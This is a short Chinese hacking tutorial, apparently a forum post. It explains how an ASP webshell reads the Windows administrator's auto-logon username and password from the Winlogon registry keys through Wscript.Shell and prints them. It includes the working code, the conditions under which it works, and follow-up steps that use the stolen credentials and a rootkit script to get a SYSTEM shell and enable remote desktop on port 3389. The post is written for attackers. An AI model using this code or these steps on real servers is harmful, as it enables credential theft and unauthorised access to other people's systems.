0x0 前言0x1 读取密码的代码//如下: Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName") Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword") Response.Write "<li type=square>用户名:"&Admin&"<br>" Response.Write "<li type=square>密码:"&Passwd&"<br>"
可以看到这些代码的意思就是读取管理员的账号和密码,并且打印出来! 于是,我们就可以拿到了管理员的账号密码! 那么大马是用什么方式读取注册表的呢: set wsh=createobject("Wscript.Shell")
用wscript.Shell来操作的! 0x2 适用条件看完了以后,肯定有人疑问,如果我说的是真的,那不就不用提权了馬?其实不然,这里要强调一下适用条件: -->>>T00ls的大表哥给出的<<<-- >>webshell的权限比较大:帖子的测试环境是network service! >>Wscript.Shell未禁用!(个人观点) 0x3 问题解决如果读取了管理密码,人家3389没开呢?我们可以用rootkit脚本,然后用管理员账号密码登陆,然后获得一个system权限的cmdshell来开启3389!
|